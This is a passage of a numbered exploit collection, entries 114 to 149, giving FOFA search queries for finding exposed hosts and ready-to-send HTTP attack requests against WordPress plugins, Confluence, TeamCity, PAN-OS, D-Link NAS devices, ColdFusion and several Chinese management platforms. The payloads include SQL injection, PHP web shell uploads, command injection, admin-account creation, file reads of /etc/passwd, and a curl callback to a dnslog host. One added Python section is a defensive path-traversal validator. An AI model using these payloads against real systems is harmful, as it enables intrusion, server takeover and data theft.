User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰智能) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰智能) S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰智能) S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo (百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰智能) Smart S200 management platform importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is base64-encoded, not encrypted: c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version(), which the exportexcelbysql export runs as-is.
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
The output of the injected command (id here) comes back in the X-Cmd-Response header of the response.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Enc
oding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Written file: http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; from there system commands can be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
The external entity points at a DNS-log host; a lookup of that name coming from the target confirms the blind XXE.
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
Note that the file part declares Content-Type: image/png while carrying PHP.
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
Time-based blind injection through the orderBy parameter (the response is delayed by 3 seconds when the database name is 11 characters long):
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
A request to a path that would return 404 is forwarded internally to the JSP named in the jsp parameter; the ;.jsp suffix makes /app/rest/users pass the authentication check as if it were a JSP resource, so an unauthenticated request can create a SYSTEM_ADMIN user:
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
Path traversal variants that reach the admin diagnostics page without authentication:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
Error-based injection through the IPAddr field of the addmacbind message; the updatexml() error message returns the database version:
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
Error-based injection through GroupId; the EXTRACTVALUE() error returns md5(102103122):
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
The /api/cors/ proxy fetches the URL embedded in the path; a DNS lookup of the dnslog name from the target confirms the SSRF:
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立迅) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Time-based blind injection (SLEEP(5)) through the uuid parameter:
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Time-based blind injection through the usr_number parameter:
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Time-based blind injection through the enterprise_uuid parameter:
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Time-based blind injection through the imei parameter (timestamp and sign must be present but their values are not checked here):
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
Union-based injection through the dep_level POST parameter; md5(1) appears in the response when it works:
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id). The user and passwd values are the fixed credentials the POC relies on; passwd is base64-encoded as well.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
The SESSID cookie value is used as a file name without sanitisation: the traversal creates a file under the device telemetry directory whose name contains a backticked command, and the command runs when the telemetry job later processes that file name. Replace the dnslog address with your own and watch for the callback.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
url is base64 (cnRzcDovL2EK decodes to rtsp://a followed by a newline) and transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response:
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

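The three traversal requests in this list (aiohttp's /static/ handler in entry 126, the ColdFusion file_name parameter in entry 129 and RaidenMAILD's /webeditor/ here in entry 147) work for the same reason: the server joins a client-supplied relative path onto a base directory without verifying that the result still lies inside it. The Python below is an added illustration of that class, not code from aiohttp, ColdFusion or RaidenMAILD: the naive join beside a hardened one, run over the page's own payloads plus double-encoded and backslash variants. The base directory /srv/app/static is assumed.

```python
"""
Added illustration of the path-traversal class behind entries 126, 129 and 147.
This is not code from aiohttp, ColdFusion or RaidenMAILD; the base directory
/srv/app/static and the file names are assumed for the demonstration.
"""
import os
import posixpath
from urllib.parse import unquote

# The relative part of each request as the vulnerable handler sees it after
# stripping its route prefix (/static/, file_name=, /webeditor/).
PAGE_PAYLOADS = {
    "126 aiohttp": "../../../../../etc/passwd",
    "129 ColdFusion": "../../../../../../../etc/passwd",
    "147 RaidenMAILD": "../../../windows/win.ini",
}


def naive_join(base_dir: str, requested: str) -> str:
    """Vulnerable pattern: concatenate and serve. '..' segments walk out of base_dir."""
    return os.path.join(base_dir, requested.lstrip("/"))


def safe_join(base_dir: str, requested: str) -> str:
    """Hardened join: decode, normalise, then prove the resolved path stays inside base_dir."""
    # Decode twice so a double-encoded %252e%252e cannot slip past a single decode.
    decoded = unquote(unquote(requested))
    # Backslashes are separators on Windows targets (entry 147 reads win.ini).
    decoded = decoded.replace("\\", "/")
    # NUL truncates paths in C-backed file APIs; never let it through.
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    # posixpath.normpath collapses '.' and '..' the same way on every host OS.
    normalised = posixpath.normpath(decoded)
    if normalised.startswith("/") or normalised == ".." or normalised.startswith("../"):
        raise PermissionError(f"path escapes base directory: {requested!r}")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, normalised))
    # realpath also follows symlinks, so a link inside base_dir pointing outside is caught.
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PermissionError(f"path escapes base directory: {requested!r}")
    return candidate


def check_requests(base_dir: str = "/srv/app/static") -> dict:
    """Run each page payload through both joins: the naive one escapes, the safe one refuses."""
    results = {}
    for label, payload in PAGE_PAYLOADS.items():
        escaped_to = os.path.realpath(naive_join(base_dir, payload))
        try:
            safe_join(base_dir, payload)
            refused = False
        except PermissionError:
            refused = True
        results[label] = {"naive_resolves_to": escaped_to, "safe_refused": refused}
    return results


if __name__ == "__main__":
    for label, outcome in check_requests().items():
        print(f"{label}: {outcome}")
```

The rejection happens before any file system access, and the realpath comparison is kept as a second line of defence for symlinks placed inside the static directory.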
148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source dashboard remote command execution
FOFA:title="AJ-Report"
The validationRules field is evaluated as JavaScript on the server, where java.lang.ProcessBuilder is reachable. The ;swagger-ui/ segment is a matrix parameter: the authentication filter lets any path containing swagger-ui through, while the framework still routes the request to /dataSetParam/verification.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

